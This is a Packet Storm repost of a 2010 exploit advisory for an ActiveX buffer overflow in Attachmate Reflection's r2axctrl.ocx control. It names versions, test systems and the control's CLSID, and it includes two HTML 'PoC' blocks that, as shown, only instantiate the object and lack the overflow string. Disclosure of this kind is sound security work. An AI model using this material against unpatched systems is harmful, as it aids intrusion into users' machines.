Reflection Attachmate Reflection Standard Suite 2008 suffers from Active-X related buffer overflow vulnerabilities.
9f09724ba426e6ee03a5069afc5d432e18cafb72c3a470f3ba67e5a9d6e56a16
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
# Exploit Title: Reflection Attachmate Reflection Standard Suite 2008
activex buffer overflow
# Date: Mar 11, 2010 found
# Author: Rad L. Sneak (JB)
# Software Link: http://www.attachmate.com/Evals/ruo2/eval-form.htm
# Version: 13.0 & 14.0
# Tested on: WinXP SP3 & Win7 64bit
# CVE : None yet
Attachmate Reflection Standard Suite 2008 & Reflection X Both contain a
buffer overflow that could be triggered via activex. when r2axctrl.ocx
is sent large string to the Reflection for UNIX & OpenVMS control class
a crash happens that overwrites EIP with 41414141.
Please let me know if there is problems with the attachment. It contains
PoC code.
Thank you
Rad L. Sneak (JB)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iQEcBAEBAgAGBQJL8rGfAAoJEMUkYWFtbqnq1uoH/0y2ZsaQh5Rxs/bCuyDDTeML
qq+loYBEOZqpWgY0ZPSmYeVKWZubgBjbpR1ki2WIfOcPvlcM3G1monWwwd0TwWhn
opwsaTlyP8Kd7QfL/ndgfYaAhKG9oHcf+TGDEuLz4QyUZ9xzZvLoBP7I8lhpkI+g
5I85/YmZFbHmejt3v65qWy9V83Fztxuq0XD7Z3JL/dDMDJak8gxZzy4JuZacewMT
iSsMF2ddQ5kjsb+Eeh8JZrAozJChbg2nZ0X7hXnfUmxA+iJ2sWj+HCw6gzKRKQ2p
MCeo5DKNVwttMxE2LHdHz808ZGBJTf4hdqLbmWUw9apWngtbQPg9zLXqvRnmc40=
=GKxw
-----END PGP SIGNATURE-----
# Exploit Title: Reflection Attachmate Reflection Standard Suite 2008 activex buffer overflow
# Date: Mar 11, 2010 found
# Author: Rad L. Sneak (JB)
# Software Link: http://www.attachmate.com/Evals/ruo2/eval-form.htm
# Version: 13.0 & 14.0
# Tested on: WinXP SP3 & Win7 64bit
# CVE : None yet
Attachmate Reflection Standard Suite 2008 & Reflection X Both contain a buffer overflow that could be triggered via activex. when r2axctrl.ocx is sent large string to the Reflection for UNIX & OpenVMS control class a crash happens that overwrites EIP with 41414141.
# Code : [PoC exploit below]
______________________________________________________________________________
<html>
PoC1
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:15B168B2-AD3C-11D1-A8D8-00A0C9200E61' id='target' />
</job></package></html>
___________________________________________________________________________________
May need to throw a refresh to trigger PoC2 completely
__________________________________________________________________________________
<html>
PoC2
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:15B168B2-AD3C-11D1-A8D8-00A0C9200E61' id='target' />
</job></package></html>
___________________________________________________________________________________________
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed